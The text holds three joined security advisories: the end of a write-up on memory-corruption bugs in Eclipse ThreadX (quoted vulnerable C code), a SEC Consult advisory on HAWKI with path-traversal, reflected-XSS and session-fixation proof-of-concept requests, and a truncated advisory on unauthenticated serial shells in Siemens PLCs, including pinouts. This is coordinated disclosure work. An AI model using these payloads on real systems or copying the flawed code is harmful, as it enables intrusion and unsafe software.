the code, memory<br />corruption could have occured:<br />```c<br />static UINT nx_azure_iot_adu_agent_reported_properties_state_send(NX_AZURE_IOT_ADU_AGENT *adu_agent_ptr)<br />{<br /><br />NX_PACKET *packet_ptr;<br />NX_AZURE_IOT_JSON_WRITER json_writer;<br />NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_CONTENT *manifest_content = &(adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest_content);<br />UINT status;<br />UINT result_code;<br />UINT i;<br />/* Prepare the buffer for step name: such as: "step_0", the max name is "step_xxx". */<br />CHAR step_property_name[8] = "step_";<br />UINT step_size = sizeof("step_") - 1;<br />UINT step_property_name_size;<br />UINT update_id_length;<br />...<br /> /* Fill installed update id. */<br /> if ((adu_agent_ptr -> nx_azure_iot_adu_agent_state == NX_AZURE_IOT_ADU_AGENT_STATE_IDLE) && <br /> (adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest_content.steps_count))<br /> {<br /><br /> /* Use nx_azure_iot_adu_agent_update_manifest as temporary buffer to encode the update id as string.*/<br /> update_id_length = (UINT)snprintf((CHAR *)adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest,<br /> NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_SIZE,<br /> "{\"%.*s\":\"%.*s\",\"%.*s\":\"%.*s\",\"%.*s\":\"%.*s\"}",<br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_PROVIDER) - 1,<br /> NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_PROVIDER,<br /> manifest_content -> update_id.provider_length, manifest_content -> update_id.provider, <br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_NAME) - 1,<br /> NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_NAME,<br /> manifest_content -> update_id.name_length, manifest_content -> update_id.name,<br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_VERSION) - 1,<br /> NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_VERSION,<br /> manifest_content -> update_id.version_length, manifest_content -> update_id.version); // VULN: unsafe use of snprintf() return value<br /><br /> if (nx_azure_iot_json_writer_append_property_with_string_value(&json_writer,<br /> (const UCHAR *)NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_INSTALLED_CONTENT_ID,<br /> sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_INSTALLED_CONTENT_ID) - 1,<br /> adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest,<br /> update_id_length)) // VULN: potentially large length is used to populate the "installedUpdateId" JSON property<br /> {<br /> nx_packet_release(packet_ptr);<br /> return (NX_NOT_SUCCESSFUL);<br /> }<br /> }<br />...<br />```<br /><br />We also spotted some potentially ineffective size checks due to assertions in<br />Eclipse ThreadX USBX, in the following files:<br />* /common/core/src/ux_hcd_sim_host_transaction_schedule.c<br />* /common/usbx_device_classes/src/ux_device_class_audio20_control_process.c<br /><br />If assertions were compiled-out in production code and `td -><br />ux_sim_host_td_length` was attacker-controlled, the `_ux_utility_memory_copy()`<br />function would have been able to write past the `slave_transfer_request -><br />ux_slave_transfer_request_setup` fixed-size (8 bytes) buffer:<br />```c<br />UINT _ux_hcd_sim_host_transaction_schedule(UX_HCD_SIM_HOST *hcd_sim_host, UX_HCD_SIM_HOST_ED *ed)<br />{<br /><br />UX_DCD_SIM_SLAVE *dcd_sim_slave;<br />UX_HCD_SIM_HOST_TD *td;<br />UX_HCD_SIM_HOST_TD *head_td;<br />UX_HCD_SIM_HOST_TD *tail_td;<br />UX_HCD_SIM_HOST_TD *data_td;<br />UX_ENDPOINT *endpoint;<br />UX_SLAVE_ENDPOINT *slave_endpoint;<br />UX_DCD_SIM_SLAVE_ED *slave_ed;<br />ULONG slave_transfer_remaining;<br />UCHAR wake_host;<br />UCHAR wake_slave;<br />ULONG transaction_length;<br />ULONG td_length;<br />UX_SLAVE_TRANSFER *slave_transfer_request;<br />UX_TRANSFER *transfer_request;<br />ULONG endpoint_index;<br />UX_SLAVE_DCD *dcd;<br /><br /> UX_PARAMETER_NOT_USED(hcd_sim_host);<br /><br /> /* Get the pointer to the DCD portion of the simulator. */<br /> dcd = &_ux_system_slave -> ux_system_slave_dcd;<br /><br /> /* Check the state of the controller if OPERATIONAL . */<br /> if (dcd -> ux_slave_dcd_status != UX_DCD_STATUS_OPERATIONAL)<br /> return(UX_ERROR);<br /><br /> /* Get the pointer to the candidate TD on the host. */<br /> td = ed -> ux_sim_host_ed_head_td;<br /><br /> /* Get the pointer to the endpoint. */<br /> endpoint = ed -> ux_sim_host_ed_endpoint;<br /><br /> /* Get the pointer to the transfer_request attached with this TD. */<br /> transfer_request = td -> ux_sim_host_td_transfer_request;<br /><br /> /* Get the index of the endpoint from the host. */<br /> endpoint_index = endpoint -> ux_endpoint_descriptor.bEndpointAddress & ~(ULONG)UX_ENDPOINT_DIRECTION;<br /><br /> /* Get the address of the device controller. */<br /> dcd_sim_slave = (UX_DCD_SIM_SLAVE *) dcd -> ux_slave_dcd_controller_hardware;<br /><br /> /* Get the endpoint as seen from the device side. */<br />#ifdef UX_DEVICE_BIDIRECTIONAL_ENDPOINT_SUPPORT<br /> slave_ed = ((endpoint -> ux_endpoint_descriptor.bEndpointAddress == 0) ?<br /> &dcd_sim_slave -> ux_dcd_sim_slave_ed[0] :<br /> ((endpoint -> ux_endpoint_descriptor.bEndpointAddress & UX_ENDPOINT_DIRECTION) ?<br /> &dcd_sim_slave -> ux_dcd_sim_slave_ed_in[endpoint_index] :<br /> &dcd_sim_slave -> ux_dcd_sim_slave_ed[endpoint_index]));<br />#else<br /> slave_ed = &dcd_sim_slave -> ux_dcd_sim_slave_ed[endpoint_index];<br />#endif<br /><br /> /* Is this ED used? */<br /> if ((slave_ed -> ux_sim_slave_ed_status & UX_DCD_SIM_SLAVE_ED_STATUS_USED) == 0)<br /> return(UX_ERROR);<br /><br /> /* Is this ED ready for transaction or stalled ? */<br /> if ((slave_ed -> ux_sim_slave_ed_status & (UX_DCD_SIM_SLAVE_ED_STATUS_TRANSFER | UX_DCD_SIM_SLAVE_ED_STATUS_STALLED)) == 0)<br /> return(UX_ERROR);<br /><br /> /* Get the logical endpoint from the physical endpoint. */<br /> slave_endpoint = slave_ed -> ux_sim_slave_ed_endpoint;<br /><br /> /* Get the pointer to the transfer request. */<br /> slave_transfer_request = &slave_endpoint -> ux_slave_endpoint_transfer_request;<br /><br /> /* Check the phase for this transfer, if this is the SETUP phase, treatment is different. Explanation of how <br /> control transfers are handled in the simulator: if the data phase is OUT, we handle it immediately, meaning we <br /> send all the data to the device and remove the STATUS TD in the same scheduler call. If the data phase is IN, we <br /> only take out the SETUP TD and handle the data phase like any other non-control transactions (i.e. the scheduler <br /> calls us again with the DATA TDs). */<br /> if (td -> ux_sim_host_td_status & UX_HCD_SIM_HOST_TD_SETUP_PHASE)<br /> {<br /><br /> /* For control transfer, stall is for protocol error and it's cleared any time when SETUP is received */<br /> slave_ed -> ux_sim_slave_ed_status &= ~(ULONG)UX_DCD_SIM_SLAVE_ED_STATUS_STALLED;<br /><br /> /* Validate the length to the setup transaction buffer. */<br /> UX_ASSERT(td -> ux_sim_host_td_length == 8); // VULN: if assertions are compiled-out in production code, this check is ineffective<br /><br /> /* Reset actual data length (not including SETUP received) so far. */<br /> slave_transfer_request -> ux_slave_transfer_request_actual_length = 0;<br /><br /> /* Move the buffer from the host TD to the device TD. */<br /> _ux_utility_memory_copy(slave_transfer_request -> ux_slave_transfer_request_setup,<br /> td -> ux_sim_host_td_buffer,<br /> td -> ux_sim_host_td_length); /* Use case of memcpy is verified. */ // VULN: potential buffer overflow due to ineffective size check<br />```<br /><br />If assertions were compiled-out in production code and `data_length` was<br />attacker-controlled, the `_ux_utility_memory_copy()` function would have been<br />able to write past the `transfer -> ux_slave_transfer_request_data_pointer`<br />buffer:<br />```c<br />...<br />UINT _ux_device_class_audio20_control_process(UX_DEVICE_CLASS_AUDIO *audio,<br /> UX_SLAVE_TRANSFER *transfer,<br /> UX_DEVICE_CLASS_AUDIO20_CONTROL_GROUP *group)<br />{<br /><br />UX_SLAVE_ENDPOINT *endpoint;<br />UX_DEVICE_CLASS_AUDIO20_CONTROL *control;<br />UCHAR request;<br />UCHAR request_type;<br />UCHAR unit_id;<br />UCHAR control_selector;<br />UCHAR channel_number;<br />ULONG request_length;<br />ULONG data_length;<br />ULONG i;<br />ULONG n_sub, pos, min, max, res, freq;<br /><br /> /* Get instances. */<br /> endpoint = &audio -> ux_device_class_audio_device -> ux_slave_device_control_endpoint;<br /> transfer = &endpoint -> ux_slave_endpoint_transfer_request;<br /><br /> /* Extract all necessary fields of the request. */<br /> request = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_REQUEST);<br /> request_type = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_REQUEST_TYPE);<br /> unit_id = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_ENEITY_ID);<br /> control_selector = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_CONTROL_SELECTOR);<br /> channel_number = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_CHANNEL_NUMBER);<br /> request_length = _ux_utility_short_get(transfer -> ux_slave_transfer_request_setup + UX_SETUP_LENGTH);<br /><br /> for (i = 0; i < group -> ux_device_class_audio20_control_group_controls_nb; i ++)<br /> {<br /> control = &group -> ux_device_class_audio20_control_group_controls[i];<br /><br /> /* Reset change map. */<br /> control -> ux_device_class_audio20_control_changed = 0;<br /><br /> /* Is this request a clock unit request? */<br /> if (unit_id == control -> ux_device_class_audio20_control_cs_id)<br /> {<br /><br /> /* Clock Source request.<br /> * We only support Sampling Frequency Control here.<br /> * The Sampling Frequency Control must support the CUR and RANGE(MIN, MAX, RES) attributes.<br /> */<br />...<br /> /* We just support sampling frequency control, GET request. */<br /> if ((request_type & UX_REQUEST_DIRECTION) == UX_REQUEST_IN &&<br /> (control_selector == UX_DEVICE_CLASS_AUDIO20_CS_SAM_FREQ_CONTROL))<br /> {<br /><br /> switch(request)<br /> {<br /> case UX_DEVICE_CLASS_AUDIO20_CUR:<br /><br /> /* Check request parameter. */<br /> if (request_length < 4)<br /> break;<br /><br /> /* Send sampling frequency. */<br /> if (control -> ux_device_class_audio20_control_sampling_frequency)<br /> _ux_utility_long_put(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency);<br /> else<br /> _ux_utility_long_put(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency_cur);<br /> _ux_device_stack_transfer_request(transfer, 4, request_length);<br /> return(UX_SUCCESS);<br /><br /> case UX_DEVICE_CLASS_AUDIO20_RANGE:<br /><br /> /* Check request parameter. */<br /> if (request_length < 2)<br /> break;<br /><br /> if (control -> ux_device_class_audio20_control_sampling_frequency == 0)<br /> {<br /><br /> /* Send range parameters, RANGE is customized. */<br /> UX_ASSERT(control -> ux_device_class_audio20_control_sampling_frequency_range != UX_NULL);<br /><br /> /* Get wNumSubRanges. */<br /> n_sub = _ux_utility_short_get(control -> ux_device_class_audio20_control_sampling_frequency_range);<br /> UX_ASSERT(n_sub > 0);<br /><br /> /* Calculate length, n_sub is 16-bit width, result not overflows ULONG. */<br /> data_length = 2 + n_sub * 12;<br /> UX_ASSERT(data_length <= UX_SLAVE_REQUEST_CONTROL_MAX_LENGTH); // VULN: if assertions are compiled-out in production code, this check is ineffective<br /><br /> /* Copy data. */<br /> data_length = UX_MIN(data_length, request_length);<br /> _ux_utility_memory_copy(transfer -> ux_slave_transfer_request_data_pointer,<br /> control -> ux_device_class_audio20_control_sampling_frequency_range,<br /> data_length); /* Use case of memcpy is verified. */ // VULN: potential buffer overflow due to ineffective size check<br />...<br />```<br /><br />Please note that there may be other instances/variants of these last bugs.<br />Therefore, a thorough assessment of all assertions used to check buffer sizes<br />in Eclipse ThreadX codebase is recommended.<br /><br />Finally, in Eclipse ThreadX USBX before pull request #161 was merged, there was<br />a memory copy with unchecked size in the<br />`_ux_host_class_pima_storage_info_get()` function in the following file:<br />* /common/usbx_host_classes/src/ux_host_class_pima_storage_info_get.c<br /><br />There was no size check for the two memory copy operations via the<br />`_ux_utility_memory_copy()` function marked below. Therefore, a write past the<br />end of the fixed size (256 bytes) buffer `storage -><br />ux_host_class_pima_storage_description` could have occured:<br />```c<br />UINT _ux_host_class_pima_storage_info_get(UX_HOST_CLASS_PIMA *pima,<br /> UX_HOST_CLASS_PIMA_SESSION *pima_session,<br /> ULONG storage_id, UX_HOST_CLASS_PIMA_STORAGE *storage)<br />{<br /><br />UX_HOST_CLASS_PIMA_COMMAND command;<br />UINT status;<br />UCHAR *storage_buffer;<br />UCHAR *storage_pointer;<br />ULONG unicode_string_length;<br /><br /> /* If trace is enabled, insert this event into the trace buffer. */<br /> UX_TRACE_IN_LINE_INSERT(UX_TRACE_HOST_CLASS_PIMA_STORAGE_INFO_GET, pima, storage_id, storage, 0, UX_TRACE_HOST_CLASS_EVENTS, 0, 0)<br /><br /> /* Check if this session is valid or not. */<br /> if (pima_session -> ux_host_class_pima_session_magic != UX_HOST_CLASS_PIMA_MAGIC_NUMBER)<br /> return (UX_HOST_CLASS_PIMA_RC_SESSION_NOT_OPEN);<br /><br /> /* Check if this session is opened or not. */<br /> if (pima_session -> ux_host_class_pima_session_state != UX_HOST_CLASS_PIMA_SESSION_STATE_OPENED)<br /> return (UX_HOST_CLASS_PIMA_RC_SESSION_NOT_OPEN);<br /><br /> /* Issue command to get the storage IDs. 1 parameter. */<br /> command.ux_host_class_pima_command_nb_parameters = 1;<br /><br /> /* Parameter 1 is the Storage ID. */<br /> command.ux_host_class_pima_command_parameter_1 = storage_id;<br /><br /> /* Other parameters unused. */<br /> command.ux_host_class_pima_command_parameter_2 = 0;<br /> command.ux_host_class_pima_command_parameter_3 = 0;<br /> command.ux_host_class_pima_command_parameter_4 = 0;<br /> command.ux_host_class_pima_command_parameter_5 = 0;<br /><br /> /* Then set the command to GET_STORAGE_INFO. */<br /> command.ux_host_class_pima_command_operation_code = UX_HOST_CLASS_PIMA_OC_GET_STORAGE_INFO;<br /><br /> /* Allocate some DMA safe memory for receiving the storage info block. */<br /> storage_buffer = _ux_utility_memory_allocate(UX_SAFE_ALIGN, UX_CACHE_SAFE_MEMORY, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH);<br /> if (storage == UX_NULL)<br /> return(UX_MEMORY_INSUFFICIENT);<br /><br /> /* Issue the command. */<br /> status = _ux_host_class_pima_command(pima, &command, UX_HOST_CLASS_PIMA_DATA_PHASE_IN , storage_buffer,<br /> UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH);<br /><br /> /* Check the result. If the result is OK, the storage info block was read properly. */<br /> if (status == UX_SUCCESS)<br /> {<br /> /* Uncompress the storage descriptor, at least the fixed part. */<br /> _ux_utility_descriptor_parse(storage_buffer,<br /> _ux_system_class_pima_object_structure,<br /> UX_HOST_CLASS_PIMA_OBJECT_ENTRIES,<br /> (UCHAR *) storage);<br /><br /> /* Copy the storage description field. Point to the beginning of the storage description string. */<br /> storage_pointer = storage_buffer + UX_HOST_CLASS_PIMA_STORAGE_VARIABLE_OFFSET;<br /><br /> /* Get the unicode string length. */<br /> unicode_string_length = (ULONG) *storage_pointer ;<br /><br /> /* Copy that string into the storage description field. */<br /> _ux_utility_memory_copy(storage -> ux_host_class_pima_storage_description, storage_pointer, unicode_string_length); /* Use case of memcpy is verified. */ // VULN: unchecked copy size for a copy in a fixed size (256 bytes) buffer (UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH used to dynamically allocate storage_buffer is 512 bytes)<br /><br /> /* Point to the volume label. */<br /> storage_pointer = storage_buffer + UX_HOST_CLASS_PIMA_STORAGE_VARIABLE_OFFSET + unicode_string_length;<br /><br /> /* Get the unicode string length. */<br /> unicode_string_length = (ULONG) *storage_pointer ;<br /><br /> /* Copy that string into the storage volume label field. */<br /> _ux_utility_memory_copy(storage -> ux_host_class_pima_storage_volume_label, storage_pointer, unicode_string_length); /* Use case of memcpy is verified. */ // VULN: unchecked copy size for a copy in a fixed size (256 bytes) buffer (UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH used to dynamically allocate storage_buffer is 512 bytes)<br /><br /> }<br /><br /> /* Free the original storage info buffer. */<br /> _ux_utility_memory_free(storage_buffer);<br /><br /> /* Return completion status. */<br /> return(status);<br />}<br />```<br /><br /><br />--[ 4 - Affected products<br /><br />Eclipse ThreadX before version 6.4.0 was affected by the vulnerabilities<br />discussed in this advisory. The other bugs in Eclipse ThreadX NetX Duo and USBX<br />that we reported will be patched in subsequent releases of Eclipse ThreadX.<br /><br /><br />--[ 5 - Remediation<br /><br />Eclipse ThreadX maintainers have fixed all vulnerabilities discussed in this<br />advisory.<br /><br />Please check the official Eclipse ThreadX channels for further information<br />about fixes.<br /><br /><br />--[ 6 - Disclosure timeline<br /><br />We reported the vulnerabilities discussed in this advisory to Microsoft in<br />December 2023 and early January 2024, via their MSRC Researcher Portal [8].<br />For our efforts, we were awarded 7th place in the Top MSRC 2023 Q4 Azure<br />Security Researchers Leaderboard [9].<br /><br />Following the project ownership transfer to the Eclipse Foundation, with<br />Microsoft's help, we coordinated with the new maintainers to provide<br />vulnerability information and fixes to the ThreadX users' community.<br /><br />The (simplified) coordinated disclosure timeline follows:<br /><br />2023-12-01: Reported two vulnerabilities to MSRC.<br />2023-12-13: MSRC confirmed our first vulnerability.<br />2023-12-14: MSRC confirmed our second vulnerability.<br />2023-12-21: Reported other two vulnerabilities to MSRC.<br />2023-12-31: Reported another vulnerability to MSRC.<br />2024-01-02: Reported other three vulnerabilities to MSRC.<br />2024-01-05: MSRC confirmed a vulnerability was fixed in version 6.4.<br />2024-01-06: MSRC informed us we made the 2023 Q4 leaderboard!<br />2024-01-10: MSRC confirmed another vulnerability was fixed in version 6.4.<br />2024-02-10: Asked MSRC for updates on all open reports.<br />2024-02-16: Asked the Eclipse Foundation for advice on how to proceed.<br />2024-02-20: Eclipse replied they were coordinating with MSRC.<br />2024-02-21: MSRC informed us of the ownership transfer to Eclipse.<br />2024-02-27: MSRC confirmed a third vulnerability was fixed in version 6.4.<br />2024-02-28: Upon MSRC's request, we submitted our reports to Eclipse.<br />2024-03-05: Eclipse started creating GitHub advisories for all reports.<br />2024-03-13: Provided Eclipse with clarifications on some of the reports.<br />2024-03-15: MSRC provided some additional feedback on the transition.<br />2024-03-18: Eclipse finished creating GitHub advisories for all reports.<br />2024-03-22: MSRC closed the remaining cases after the transition.<br />2024-03-25: Eclipse published CVE-2024-2212, CVE-2024-2214, CVE-2024-2452.<br />2024-03-29: Provided Eclipse with clarifications on remaining reports.<br />2024-04-24: Asked for a status update on the remaining reports.<br />2024-04-26: Agreed to declass the remaining reports to standard issues.<br />2024-05-02: Sent draft advisory and writeup to MSRC and Eclipse.<br />2024-05-28: Published advisory and writeup.<br /><br /><br />--[ 7 - Acknowledgments<br /><br />We would like to thank MSRC and the Eclipse Foundation (with a special mention<br />to Marta Rybczynska who took care of coordinated disclosure after the project<br />ownership change) for triaging and fixing the reported vulnerabilities. It was<br />a pleasure to work with you!<br /><br /><br />--[ 8 - References<br /><br />[1] https://eclipse-foundation.blog/2023/11/21/introducing-eclipse-threadx/<br />[2] https://github.com/eclipse-threadx/<br />[3] https://security.humanativaspa.it/ost2-zephyr-rtos-and-a-bunch-of-cves/<br />[4] https://security.humanativaspa.it/multiple-vulnerabilities-in-rt-thread-rtos/<br />[5] https://security.humanativaspa.it/multiple-vulnerabilities-in-riot-os/<br />[6] https://security.humanativaspa.it/big-update-to-my-semgrep-c-cpp-ruleset/<br />[7] https://security.humanativaspa.it/a-collection-of-weggli-patterns-for-c-cpp-vulnerability-research/<br />[8] https://msrc.microsoft.com/report/vulnerability<br />[9] https://msrc.microsoft.com/blog/2024/01/congratulations-to-the-top-msrc-2023-q4-security-researchers/<br /><br /><br />Copyright (c) 2024 Marco Ivaldi and Humanativa Group. All rights reserved.<br /></code></pre>
<pre><code> SEC Consult Vulnerability Lab Security Advisory < 20240527-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities<br /> product: HAWKI (Interaction Design Team at the University of Applied<br /> Sciences and Arts in Hildesheim/Germany)<br /> vulnerable version: 1.0.0-beta.1, versions before commit 146967f<br /> fixed version: Github commit 146967f<br /> CVE number: CVE-2024-25975, CVE-2024-25976, CVE-2024-25977<br /> impact: high<br /> homepage: https://github.com/HAWK-Digital-Environments/HAWKI<br /> found: 2024-03-05<br /> by: Florian Stuhlmann (Office Bochum)<br /> Thorger Jansen (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"HAWKI is a didactic interface for universities based on the OpenAI API.<br />It is not necessary for users to create an account, the university ID<br />is sufficient for login - no user-related data is stored."<br /><br />Source: https://github.com/HAWK-Digital-Environments/HAWKI<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Arbitrary File Overwrite (CVE-2024-25975)<br />The application implements an up- and downvote function which alters a<br />value within a JSON file. The POST parameters are not filtered properly<br />and therefore an arbitrary file can be overwritten. The file can be<br />controlled by an authenticated attacker, the content cannot be controlled.<br />It is possible to overwrite all files for which the webserver has write access.<br />It is required to supply a relative path (path traversal).<br /><br />2) Reflected Cross-Site-Scripting (CVE-2024-25976)<br />When LDAP authentication is activated in the configuration it is possible<br />to obtain reflected XSS execution by creating a custom URL that the<br />victim only needs to open in order to execute arbitrary JavaScript code in<br />the victim's browser.<br /><br />3) Session Fixation (CVE-2024-25977)<br />The application does not change the session token when using the login or<br />logout functionality. An attacker can set a session token in the victim's<br />browser (e.g. via XSS) and prompt the victim to log in (e.g. via a redirect<br />to the login page). This results in the victim's account being taken over.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Arbitrary File Overwrite (CVE-2024-25975)<br />The following POST request can overwrite the file "AvatarFinanzen.png". This<br />file is a default file located within the "img" folder.<br /><br />---<br />POST /downvote.php HTTP/2<br />Host: $host<br />Cookie: PHPSESSID=<Session Id><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 25<br /><br />../img/AvatarFinanzen.png<br />---<br /><br />Both upvote.php and downvote.php are vulnerable. The vulnerable part in<br />downvote.php is:<br /><br />---<br />[...]<br /> $id = file_get_contents("php://input");<br /> $sanitizedId = htmlspecialchars($id, ENT_QUOTES, 'UTF-8');<br /> $file = "feedback/" . $sanitizedId;<br />[...]<br /> file_put_contents("feedback/$sanitizedId", json_encode($json));<br />[...]<br />---<br /><br /><br />2) Reflected Cross-Site-Scripting (XSS) (CVE-2024-25976)<br />A call to the following URL will trigger an alertbox:<br /><br />---<br />https://$host/HAWKI/login.php/"><script>alert(document.cookie)</script><br />---<br /><br />This is due to a fault in the file login.php where the content of<br />"$_SERVER['PHP_SELF']" is reflected into the HTML of the website. Hence<br />the attacker does not need a valid account in order to exploit this issue<br />The following code is vulnerable:<br /><br />---<br />[...]<br /> $server = $_SERVER['PHP_SELF'];<br />[...]<br /> echo '<form action = "' . $server . '" class="column" method = "post" ><br />[...]<br />---<br /><br />The vulnerability is exploitable with the Apache2 default configuration.<br />For other webservers, the vulnerability might not be exploitable.<br /><br /><br />3) Session Fixation (CVE-2024-25977)<br />The attacker changes the value of PHPSESSID within the victim's browser to<br />something like "abc". An attacker with the same value for PHPSESSID is now<br />authenticated as well after the victim uses successfully logs in.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 1.0.0-beta.1<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-03-21: Contacting vendor through email referenced on Github<br />2024-03-22: Asking about email encryption, sending report unencrypted<br /> as requested.<br />2024-04-17: Asked the vendor again to receive details regarding the timeline.<br />2024-04-18: Vendor provides a patch pushed to the public repository.<br />2024-05: Fix verification phase.<br />2024-05-27: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patch which can be downloaded from<br />https://github.com/HAWK-Digital-Environments/HAWKI/commit/146967f3148e92d1640ffebc21d8914e2d7fb3f1<br /><br /><br />Workaround:<br />-----------<br />No workaround available.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Florian Stuhlmann & Thorger Jansen / @2024<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240524-0 ><br />=======================================================================<br /> title: Exposed Serial Shell on multiple PLCs<br /> product: Siemens CP-XXXX Series (CP-2014, CP-2016, CP-2017, CP-2019, CP-5014)<br /> vulnerable version: All hardware revisions<br /> fixed version: Hardware is EOL, no fix<br /> CVE number: -<br /> impact: Low<br /> homepage: https://www.siemens.com<br /> found: ~2023-06-01<br /> by: Steffen Robertz (Office Vienna)<br /> Gerhard Hechenberger (Office Vienna)<br /> Constantin Schieber-Knöbl (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We are a technology company focused on industry, infrastructure,<br />transport, and healthcare. From more resource-efficient factories,<br />resilient supply chains, and smarter buildings and grids, to cleaner<br />and more comfortable transportation as well as advanced healthcare,<br />we create technology with purpose adding real value for customers."<br /><br />Source: https://new.siemens.com/global/en/company/about.html<br /><br /><br />Business recommendation:<br />------------------------<br />The hardware is no longer produced nor offered to the market. Hence<br />HW adaptions resulting in modified products are not possible anymore.<br />The described HW behavior on this generation of devices cannot be<br />corrected by means of FW patches.<br /><br />The risk of successful exploitation is considered low as physical access to<br />those devices is needed.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Exposed Serial Shell on multiple Siemens PLCs<br />A serial interface can be accessed with physical access to the PCB. After<br />connecting to the interface, access to a shell with various debug functions<br />as well as a login prompt is possible.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Exposed Serial Shell on multiple Siemens PLCs<br /><br />* CP-2016 (Figure 1)<br />The serial interface on the CP-2016 can be accessed by connecting to the<br />following through hole pins of an unpopulated header:<br /><br /> +-+<br /> |o|<br /> |o|RX<br /> |o|TX<br /> |o|<br /> |o|<br /> |o|GND<br /> +-+<br /><br />* CP-2019 (Figure 2)<br />The serial interface on the CP-2019 can be accessed by connecting to the<br />following through hole pins of an unpopulated header:<br /><br /> +-+<br /> |o|<br /> |o|RX<br /> |o|TX<br /> |o|<br /> |o|<br /> |o|GND<br /> +-+<br /><br /> * CP-2014 (Figure 3)<br />The serial interface on the CP-2014 can be accessed by connecting to the<br />following through hole pins of an unpopulated header:<br /><br /> +-+<br /> |o|GND<br /> |o|<br /> |o|<br /> |o|RX<br /> |o|TX<br /> |o|<br /> +-+<br /><br /> * CP-2017 (Figure 4)<br />The serial interface on the CP-2017 can be accessed on the compute module<br />by connecting to pins 9 and 10 on the populated SMD connector:<br /><br /> 1 TX RX<br /> '-'-'-'-'-'-'-'-'-'<br /> /-------------------\<br /> | |<br /> |-------------------|<br /> +'-'-'-'-'-'-'-'-'-'+<br /> 11 20<br /><br /><br />* CP-5014 (Figure 5)<br />The serial interface on the CP-5014 can be accessed on the compute module<br />by connecting to pins 1 and 2 on the populated SMD connector:<br /><br /> RX TX 10<br /> '-'-'-'-'-'-'-'-'-'<br /> /-------------------\<br /> | |<br /> |-------------------|<br /> +'-'-'-'-'-'-'-'-'-'+<br /> 11 20<br /><br /><br />All serial connections allow access to the SH1703 shell in version 1.00.<br />The shell requires no authentication and allows the usage of multiple<br />commands.<br /><br />The following output can be seen on all devices:<br /><br />---------------------------------------------------<br /> XXXXX XXX XXX X XXXXX XXX XXX<br /> X X X X XXX 